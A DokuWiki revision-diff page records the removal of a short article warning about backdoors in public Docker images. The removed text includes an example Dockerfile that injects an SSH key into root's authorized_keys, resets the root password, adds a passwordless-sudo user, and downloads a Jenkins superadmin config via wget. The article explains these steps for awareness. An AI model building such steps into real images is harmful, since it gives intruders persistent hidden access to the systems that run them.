Wiki

User Tools

Site Tools

Trace:
docker:common_security_issues_inside_public_docker_images

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision		Previous revision
docker:common_security_issues_inside_public_docker_images [2016/10/17 13:21] – created peterdocker:common_security_issues_inside_public_docker_images [2020/05/13 08:35] (current) – removed peter
Line 1: Line 1:
-====== Docker - Common Security Issues Inside Public Docker Images ====== 
  
-Here is a simple example.  Doubtless it will misleading and hard to diagnose in real world. 
- 
-In L18-19, a ssh key is injected to to authorized_keys. If you start sshd, you’re in danger. 
-In L22, root password has been reset. Not good, isn’t it? 
-In L25-26, a malicious OS user has been added. 
-In L29-31, the user has been promoted as super admin, and he/she can run any commands without password! 
-In L34-36, your jenkins has an unpleasant admin user now. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So do the hackers! This case represents security of application layer. It’s certainly the most dangerous and difficult case. 
- 
-<code bash> 
- ########## How To Use Docker Image ############### 
- ## 
- ##  Install docker utility 
- ##  Download docker image: 
- ##   docker pull denny/test:v1 
- ##  Boot docker container: 
- ##   docker run -t -P -d --name my-test denny/test:v1 /bin/bash 
- ## 
- ##  Build Image From Dockerfile. 
- ##   docker build -f Dockerfile -t denny/test:v1 --rm=false . 
- ################################################## 
-#VALUE! 
- FROM ubuntu:14.04 
- MAINTAINER Denny <denny@dennyzhang.com> 
-#VALUE! 
- RUN mkdir -p /root/.ssh && \ 
-   # SSH login by key file 
-   echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \ 
-        >> /root/.ssh/authorized_keys && \ 
-#VALUE! 
-   # Reset root password 
-   echo 'root:ChangeMe1' | chpasswd && \ 
-#VALUE! 
-   # Add a malicious user 
-   useradd denny && \ 
-   echo 'denny:ChangeMe1' | chpasswd && \ 
-#VALUE! 
-   # Add user to super admin 
-   echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \ 
-         /etc/sudoers.d/admins && \ 
-   chmod 400 /etc/sudoers.d/admins && \ 
-#VALUE! 
-   # Add superadmin user to 
-   mkdir -p /var/lib/jenkins/users/superadmin && \ 
-   wget -O /var/lib/jenkins/users/superadmin/config.xml \ 
-     https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml 
-#VALUE! 
- CMD ["/bin/bash"] 
-</code> 
docker/common_security_issues_inside_public_docker_images.1476710460.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki